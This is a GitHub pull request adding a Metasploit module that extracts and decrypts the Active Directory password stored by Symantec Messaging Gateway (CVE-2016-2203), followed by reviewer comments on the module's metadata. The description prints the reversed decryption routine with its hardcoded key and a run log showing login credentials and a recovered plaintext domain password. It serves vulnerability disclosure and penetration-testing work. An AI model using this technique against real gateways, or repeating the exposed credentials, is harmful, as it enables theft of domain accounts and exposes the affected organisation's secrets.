### PR TITLE
Test symantec brightmail ldap creds

### PR DESCRIPTION
**Pull request by kfr-ma**
Symantec Brightmail 10.6.0-7 and earlier save the AD password somewhere in the product. By having a read account on the gateway  we manage to discover it; indeed the html code contains the encrypted AD password. 

the encryption and decryption part is implemented in Java in the appliance, by reversing the code we get to know the encryption algorithm:

public static String decrypt(String password)
    {
        byte clearText[];
        try{
        PBEKeySpec keySpec = new PBEKeySpec("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\{}`~!@#$%^&*()_+-=".toCharArray());
        SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("PBEWithMD5AndDES");
        SecretKey secretKey = keyFactory.generateSecret(keySpec);
        System.out.println("Encoded key "+ (new String(secretKey.getEncoded())));

```
    BASE64Decoder decoder = new BASE64Decoder();
    byte salt[] = decoder.decodeBuffer(password.substring(0, 12));
    PBEParameterSpec paramSpec = new PBEParameterSpec(salt, 1000);
    Cipher c = Cipher.getInstance(secretKey.getAlgorithm());
    c.init(Cipher.DECRYPT_MODE, secretKey, paramSpec);
    byte cipherText[] = decoder.decodeBuffer(password.substring(12, password.length()));
    clearText = c.doFinal(cipherText);
    return new String(clearText, "UTF-8");

    }
    catch(Exception e){
            return "nok";
    }
}
```

I contacted symantec and details is provided to them https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00

the following alerts were created :

 ['URL','https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00'],
          [ ' CVE ', ' 2016-2203 '] ,
          [ ' BID ', ' 86137 ']

I  wrote a metasploit module to exploit the vulnerability

You need at least a read account on the brightmail console .
## Verification

resource (/root/rssi/msfscripts/smgldap.rc)> use (symantec_brightmail_ldapcreds
resource (/root/rssi/msfscripts/smgldap.rc)> set VHOST 192.16.10.125
VHOST => 172.16.10.125
resource (/root/rssi/msfscripts/smgldap.rc)> set PASSWORD P@ass2018&
PASSWORD => con2015&
resource (/root/rssi/msfscripts/smgldap.rc)> set USERNAME consult
USERNAME => consult
resource (/root/rssi/msfscripts/smgldap.rc)> set RHOST  192.16.10.125
RHOST => 172.16.10.125
resource (/root/rssi/msfscripts/smgldap.rc)> run
[+]  192.16.10.125:443 - Logged in as 'consult' Sid: '47E2715B99E4E2DE7741ED9E3FA
[+] Found login = 'DOM\LDAPSYNC' password = 'NizarFakhir@2014' host ='17
[*] Auxiliary module execution completed

### CODE REVIEW

File: modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb [hunk 1]
```diff
@@ -19,18 +19,19 @@ def initialize(info = {})
...
-		  'https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00',
-		  'CVE-2016-2203'
+          ['URL','https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00'],
+          ['CVE','2016-2203'],
+          ['BID','86137']
         ],
 
       'Author'         =>
         [
           'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',
```
Comment (todb-r7) [inline modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb]: @kfr-ma you have a trailing comma here, looks like a copy-paste artifact.

File: modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb [hunk 2]
```diff
@@ -0,0 +1,283 @@
...
+      'Name'           => 'Symantec Messaging Gateway 10 LDAP Creds Graber',
+      'Description'    => %q{
+          This module will  grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed symantec pbe key.  Note that authentication is required in order to successfully grab the LDAP credentials, you need at least a read account. Version 10.6.0-7 and earlier are affected
+
+      },
+      'References'     =>
+        [
+          ['URL','https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00'],
+          ['CVE','2016-2203'],
+          ['BID','86137']
```
Comment (todb-r7) [inline modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb]: This BID looks incorrect.

File: modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb [hunk 3]
```diff
@@ -0,0 +1,283 @@
...
+          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',
+        ],
+       'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'SSLVersion' => 'TLS1',
+          'RPORT' => 443
+        },
+       'License'        => MSF_LICENSE,
+       'DisclosureDate' => "Dec 17 2015"
```
Comment (todb-r7) [inline modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb]: This DisclosureDate looks incorrect. According to the given URL, disclosure date should be April 18, 2016.

File: modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb [hunk 4]
```diff
@@ -0,0 +1,283 @@
...
+    ))
+    register_options(
+      [
+        OptInt.new('TIMEOUT', [true, 'HTTPS connect/read timeout in seconds', 1]),
```
Comment (todb-r7) [inline modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb]: Is there a reason to futz with the TIMEOUT here? This is going to timeout a lot on pokey networks.

File: modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb [hunk 5]
```diff
@@ -0,0 +1,283 @@
...
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [true, 'The username to login as']),
+        OptString.new('PASSWORD', [true, 'The password to login with'])
+      ], self.class)
+    deregister_options('RHOST')
+  end
+
+
+  def print_status(msg='')
```
Comment (todb-r7) [inline modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb]: Hey @wvu-r7 are these `def print_*` actually needed anymore in individual modules? Looks like this should all be inherited from rex/ui/text/output as is. Probably old cruft.

**Comment by todb-r7** [comment]
Oh nevermind, @kfr-ma closed it. Ah well.

**Comment by kfr-ma** [comment]
Hi guys;
Sorry for my late response I was on vacation , I return tomorrow ; and I  Will apply your improvements .
Regards

**Pull request closed without merging**